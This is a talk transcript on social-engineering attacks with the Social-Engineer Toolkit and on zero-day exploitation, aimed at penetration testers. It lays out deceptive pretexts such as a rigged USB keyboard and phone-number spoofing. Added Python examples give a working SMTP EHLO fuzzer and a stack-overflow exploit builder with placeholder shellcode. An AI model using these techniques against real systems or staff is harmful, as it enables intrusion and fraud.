Hacking your perimeter. Social-Engineering. Not everyone needs to use zero days. David Kennedy (ReL1K) http://www.secmaniac.com Twitter: Dave_ReL1K




About the speaker: Wrote the Social-Engineer Toolkit (SET), member of the Social-Engineer.org podcast, contributor to BackTrack, Metasploit, etc. Director of Information Security for a Fortune 1000, with a penetration testing and exploit focus. Worked for the US Marines; VP/Partner of an information security consulting firm.

Agenda
- Overview of perimeter security
- Main attack vectors used to compromise the perimeter
- Walkthrough of each attack vector
- Recommendations and conclusions

Overview
- Security is getting better. It's harder to find traditional vanilla attack vectors.
- Hackers adapt and overcome the controls and technology put in place.
- We'll talk about social-engineering and the zero-day angle, but there's still a ton of companies out there that do horribly when it comes to security.

Hacking your Perimeter
- Traditional attack methods don't work.
- You've undergone several dozen penetration tests and vulnerability scans.
- You have a security team and a functioning security program.
- You have anti-virus, HIPS, IPS, IDS, heuristics, and behavioral detection and prevention capabilities.

Perimeter Hacking Options
- Social-Engineering and physical attack vectors: probably our most preferred.
- Zero-Day angle: crafting an exploit against your target.

Social-Engineering and Security. Why fight your SIEM, anti-virus, HIPS/NIPS/IPS/IDS, web application firewall, secure coding practices and patch management? Why fight everything you've built your entire security program on?

It's increasingly harder to break in on the external perimeter, so the adaptation is towards our weakest link, the human element.

The easiest way in It usually takes me a week of steady fuzzing and reversing to find a zero-day and craft a reliable exploit. It takes me a day to get access to the internal network from social-engineering.

It's not just us doing this. The security community revolves around real-world attacks. We are protecting against attacks out in the wild, and hackers use social-engineering on a regular basis. State-sponsored attacks are the largest threat out there today. A country that has 10,000 people dedicated to hacking can't be good...

State-Sponsored Attacks
- Big increase in targeted attacks against organizations, to steal intellectual property and for financial gain.
- Focused attacks that use specialized tooling are difficult to protect against.

Which country is the worst? Well... Working with government agencies, I really can't say.

Completely unrelated slide

Why should they care? No repercussions (except from Google), almost untraceable, and cheap. Why build a new industry when you can take it?

A couple of SE favorites. Pretexting is your hack: what you're going to do during your social-engineering attack. Neuro-Linguistic Programming (NLP): how we think as humans.

Steps of Anchoring. Establish an Anchor: this is triggering the stimulus that will be your ultimate anchor, for example talking frantically and in need of help. Firing your Anchor (also known as Activating): you've triggered a feeling in the victim, you need help. Now you ask for that help.

So why use SE? We're lazy, we go for the easiest route.

Basics of SET. Open-source, purely Python driven. SET uses Metasploit both as the exploit repository for client-side attacks and for payloads. Multiple attack vectors specifically designed for social-engineering. Has become the standard for social-engineering in penetration tests across the world.

SET Attack Vectors
- Spear-Phishing: spoof or use already established email addresses to run spear-phishing attacks with file-format attack vectors.
- Web Attacks: multiple attack vectors including the Java applet, client-side exploits, tabnabbing, man-left-in-the-middle, and the credential harvester.
- Malicious USB/DVD/CD: autorun creation, lets you deploy MSF payloads through a simple autorun.

SET Attack Vectors (cont.)
- Arduino / Teensy USB HID Attack Vector: multiple payload selection for the USB keyboard HID attacks.

Scenario 1 - USB HID Attack Vector. Send an employee a brand new keyboard with all of the great bells and whistles, with a letter on company letterhead saying we're doing updates to keyboards. The employee plugs in the device; motion sensors detect whether the user is at the system or not. The mouse is moved 1 pixel every 3 minutes to ensure the screen does not lock.

DEMO

The keyboard attack. Needs no autorun at all: the device enumerates as a keyboard and types its commands, so it executes arbitrary code on the system regardless of autorun restrictions. Can drop malicious binaries, trigger overflows, use downloaders, implant keystroke loggers, or backdoor your stuff. Easily hidden in peripheral devices like docking stations, mice, keyboards, computers, USB thumb drives, and much more.

Integrating into Existing Hardware Most new keyboards have integrated USB Hubs.

Motion Sensor capabilities (thanks Garland)

Scenario 2 - Java Applet Attack. You perform recon on the company you're targeting. You learn their lingo and their structure, harvest email addresses, and you know your pretext. You register a domain name similar to your victim's. You call up the sales department claiming to be a customer who is experiencing issues connecting to your new company site.

DEMO

Thomas Werth Attack Vector. Released at ShmooCon, this attack vector lets you create a malicious Java applet. The user hits Run and the payload is executed on the victim's machine. Redirects the user back to the original site to make the attack less conspicuous. Heavy obfuscation of the Java and the payload for A/V bypass, and fixed major issues with Linux/OSX payload deployment. Applet source just opened today!

DEMO

Multi Attack. You want to build the best possible pretext and ensure that if one option fails, there are multiple redundancies within the attack to keep success rates up. You call the IT help desk claiming to be a high-level employee who is having issues getting to a mission-critical website. You spoof your source number to come from the executive's phone number.

DEMO

The Multi-Attack Vector. As you can see, this attack vector has multiple attacks built into one website, with failover in case one attack option is not successful. It uses a combination of the credential harvester, the Java applet, and client-side exploits to compromise the victim.

Why is it effective? We are humans, we are programmed from birth through our lives to act and behave a certain way. Our brains all work the same way, we are all vulnerable and there really is no patch.

The threat is real. So why use SET? This isn't FUD or overhyped stuff. It's meant to be incorporated into your normal penetration testing methodology. It tests your security controls and your information security awareness program, and shows how effectively you can stop these types of attacks.

Zero-Days
- A zero-day is a vulnerability (and an exploit for it) that the vendor does not yet know about, so no patch exists.
- Zero days are out there; they aren't public and they can be around for years without being released.
- Adobe has lately been getting hit, it seems, almost every week with a new zero-day.

Scenario 1
- You're performing a penetration test for CompanyXYZ; you have exhausted all manual efforts and found no viable attack path through the perimeter.
- The web applications are solid and have no apparent vulnerability.
- The zero-day angle is your only option to gain access to the systems.

An introduction to Fuzzing
- Brute-force approach to bug hunting.
- Sends malformed or oversized input (long strings, bad lengths, random bytes) in the hope of a crash.
- If the buffer length is 50, you send 51.

Precursor
- The example you are about to see is a basic stack overflow and is as easy as it gets.
- There are several different types of overflows and different ways of exploiting them.
- We'll talk shortly about Windows protection mechanisms; in this scenario they are disabled.

Buffer Overflow Example
- The SMTP server is susceptible to a stack-based overflow in the EHLO parameter.
- Sending 6000 \x41 bytes (ASCII 'A') causes a crash.
- An attacker now knows that a vulnerability is here and, with further research, can exploit it.
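The two fuzzing slides above describe one procedure: grow the EHLO argument until the daemon dies, then note the length. The following is an added example in Python (the language SET itself is written in) and is not code from the talk, from SET or from Metasploit. The vulnerable SMTP daemon is simulated in-process by a constructed class with a 50-byte buffer and no length check, matching the slide's "buffer length is 50, you send 51"; the socket transport is included so the same fuzzer can be pointed at a lab target you own.

```python
"""EHLO length fuzzer with an in-process stand-in for the vulnerable server.

Added example for this slide; it is not code from the talk, from SET or from
Metasploit. SimulatedVulnSmtp is a constructed stand-in: a 50-byte buffer with
no length check, so it "crashes" on the 51st byte exactly as the slide describes.
socket_sender() is the same probe over TCP for use against a lab target you own.
"""
import socket


def ehlo_line(length: int, fill: bytes = b"A") -> bytes:
    """Build 'EHLO ' followed by <length> fill bytes and CRLF."""
    return b"EHLO " + fill * length + b"\r\n"


class SimulatedVulnSmtp:
    """Constructed stand-in for a vulnerable SMTP daemon (not a real server).

    Mirrors a C handler that strcpy()s the EHLO argument into a fixed-size
    stack buffer: once the argument exceeds buffer_size the process dies and
    every later probe is refused, which is what a fuzzer observes as a crash.
    """

    def __init__(self, buffer_size: int = 50):
        self.buffer_size = buffer_size
        self.crashed = False

    def send(self, data: bytes) -> bytes:
        if self.crashed:
            raise ConnectionRefusedError("target is down")
        verb, _, arg = data.rstrip(b"\r\n").partition(b" ")
        if verb != b"EHLO":
            return b"500 unknown command\r\n"
        if len(arg) > self.buffer_size:   # the overflow: saved EIP gets clobbered
            self.crashed = True
            raise ConnectionResetError("connection reset by peer")
        return b"250 mail.example.test Hello\r\n"


def socket_sender(host: str, port: int = 25, timeout: float = 3.0):
    """Return a send(data) -> reply callable that uses a fresh TCP connection
    per probe, so a dead target shows up as a refused connection or timeout."""
    def send(data: bytes) -> bytes:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.recv(1024)          # 220 banner
            s.sendall(data)
            return s.recv(1024)   # empty bytes means the peer closed on us
    return send


def fuzz_ehlo(send, start: int = 1, step: int = 1, max_len: int = 10000):
    """Send EHLO with a growing argument until the target stops answering.

    Returns the first length that got no answer (reset, refused, timeout or an
    empty read), or None if the target survived every probe up to max_len.
    step=1 finds the exact boundary; a large step (e.g. 500) is the usual
    first pass, after which you narrow the window with step=1.
    """
    length = start
    while length <= max_len:
        try:
            reply = send(ehlo_line(length))
        except OSError:           # ConnectionError, socket.timeout, refused...
            return length
        if not reply:
            return length
        length += step
    return None


if __name__ == "__main__":
    target = SimulatedVulnSmtp(buffer_size=50)
    print("first crashing length:", fuzz_ehlo(target.send))   # 51
```

Against a real daemon you would swap `target.send` for `socket_sender("10.0.0.5")` (hypothetical lab address); note that a real target does not recover on its own, so the fuzzer reports the first length that killed it and you restart the service before narrowing down with a smaller step.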

Some basic instructions and registers to be aware of
- JMP <address>: jump to the instruction at that address.
- EIP: Instruction Pointer, holds the address of the next instruction to execute. When a function returns, the saved return address on the stack is popped into EIP; that saved value is what the overflow overwrites.
- ESP: Stack Pointer, points to the current top of the stack. Right after the return address is popped it points at the bytes we placed immediately after it, which is why JMP ESP is useful.
- NOP: No operation, does nothing for one instruction (0x90 on x86).
- NOP sled: a run of NOPs in front of the shellcode so that landing anywhere in the run slides execution down into the shellcode.
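To make the JMP ESP / NOP sled layout concrete, here is an added Python example (not code from the talk, SET or Metasploit) that goes from the crash to a complete overflow string: a cyclic pattern in the style of Metasploit's pattern_create to find at which offset the saved EIP is overwritten, then the buffer laid out as junk, return address, NOP sled and shellcode. The JMP ESP address and the shellcode are placeholders and the EIP value in the demo is a constructed one (it is what this pattern would put into the register); in practice the address comes from a non-ASLR module in the target process and the shellcode from your payload generator.

```python
"""From a crash to a working overflow string: offset, return address, NOP sled.

Added example for this slide; not code from the talk, SET or Metasploit. The
cyclic pattern follows the scheme Metasploit's pattern_create uses (Aa0Aa1...),
so every 4-byte window is unique. JMP_ESP_ADDR and SHELLCODE are placeholders:
the real address comes from a non-ASLR module in the target process (e.g. via
a debugger search for FF E4) and the shellcode from your payload generator.
"""
import string
import struct


def cyclic_pattern(length: int) -> bytes:
    """Aa0Aa1...Az9Ba0... pattern, truncated to length bytes (max 20280)."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern limited to %d bytes" % len(out))


def pattern_offset(pattern: bytes, eip_value: int) -> int:
    """Offset of the bytes that ended up in EIP at the crash.

    x86 is little-endian, so the register value has to be packed '<I' to get
    the byte order as it sat in the buffer before searching the pattern.
    """
    needle = struct.pack("<I", eip_value)
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError("EIP value %#x is not in the pattern" % eip_value)
    return idx


def build_exploit(offset: int, jmp_esp_addr: int, shellcode: bytes,
                  nop_len: int = 16, total_len: int = 6000) -> bytes:
    """Lay out the overflow string:

        [ 'A' * offset ][ JMP ESP addr ][ NOP sled ][ shellcode ][ padding ]

    On RET the saved return address is popped into EIP, so EIP = jmp_esp_addr
    and ESP now points at the NOP sled. JMP ESP transfers control there and
    execution slides down the 0x90s into the shellcode.
    """
    buf = b"A" * offset
    buf += struct.pack("<I", jmp_esp_addr)     # overwrites saved EIP
    buf += b"\x90" * nop_len                  # NOP sled
    buf += shellcode
    if len(buf) > total_len:
        raise ValueError("payload too large for the %d-byte trigger" % total_len)
    return buf + b"C" * (total_len - len(buf))  # keep the crash length constant


# Placeholders (assumptions, not values from the talk).
JMP_ESP_ADDR = 0x7C9D30D7   # address of an FF E4 (JMP ESP) in a non-ASLR module
SHELLCODE = b"\xcc" * 4     # INT3 breakpoints; swap in real shellcode


if __name__ == "__main__":
    # Step 1: crash the target with a pattern instead of plain A's.
    pattern = cyclic_pattern(6000)
    # Step 2: the debugger shows EIP = 0x68423368 at the crash (constructed
    # value: it is what this pattern puts there); recover the offset.
    offset = pattern_offset(pattern, 0x68423368)     # 1000
    # Step 3: build the real exploit string at the same 6000-byte length.
    exploit = build_exploit(offset, JMP_ESP_ADDR, SHELLCODE)
    print("offset:", offset, "exploit length:", len(exploit))
```

The padding after the shellcode keeps the total at the length that crashed the daemon, so the stack looks the same as during the crash; if the daemon filters certain bytes (NUL, CR, LF for an SMTP line), both the address and the shellcode must avoid them, which is why the JMP ESP address is chosen and not computed.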

How Windows is set up (diagram slide)

Before (diagram slide)

After (diagram slide)

Windows Protection Mechanisms
- Data Execution Prevention (DEP): marks the stack non-executable. In this attack, with DEP enabled, the JMP ESP would land in our shellcode but the CPU would refuse to execute it and the process would crash.
- Stack Canaries (/GS): a random cookie is placed between the local buffers and the saved return address and checked before the function returns; an overflow that reaches EIP also overwrites the cookie and the process is terminated instead.
- Address Space Layout Randomization (ASLR): randomizes where modules are loaded. On 32-bit Windows only the upper 16 bits of a module's base address change (the low 16 bits stay fixed), but that is enough to break a hardcoded JMP ESP address.

Defeating Data Execution Prevention (DEP) (and ASLR)
- Return-to-libc style attack using Return Oriented Programming (ROP): instead of executing our own code on the stack, we chain "gadgets" (short instruction sequences already present in executable memory, each ending in RET). If the gadgets come from a module that was not built with ASLR support, the same chain also sidesteps ASLR.
- Remember the JMP ESP we inserted? With DEP we can't jump into the stack. Instead, the gadgets prepare the stack as the argument frame for a call to WriteProcessMemory.
- WriteProcessMemory then copies our shellcode from the stack into memory that is already executable, for example a code cave in the module's own .text section; the API adjusts the page protection itself, so we never need an executable stack.

Protecting Against Overflows
- Third-party closed-source applications are tough. Having a mature third-party application security review process is critical.
- Internally developed software needs to undergo rigorous testing and source code analysis to ensure overflows are mitigated before reaching production.
- Have a team dedicated to researching zero-day threats and to detecting these types of attacks.

Minimizing Zero-Day Damage
- When an overflow is used, the payload generally needs a reverse connection back out to the attacker.
- Ensure tight egress filtering is in place and that servers can only connect to what is absolutely necessary on the Internet.
- With proper controls in place, even a successful exploit has limited reach.

Traditional Pentests are Dead

Out of scope... Businesses don't understand what a true penetration test represents. There is no solid framework, and not all of us get to do fun stuff like this. Things are taken out of scope, and there's limited budget.

Where we need to go

If you aren't doing this. If you aren't doing SE as part of your regular penetration tests, you are seriously missing out. If you don't know about this, you should learn. Success ratios for compromise with SET are estimated at around 94%.

Learning more about SE http://www.social-engineer.org - Created by Chris Hadnagy (loganwhd), great reference for Social- Engineering

Questions? davek@social-engineer.org Twitter: Dave_ReL1K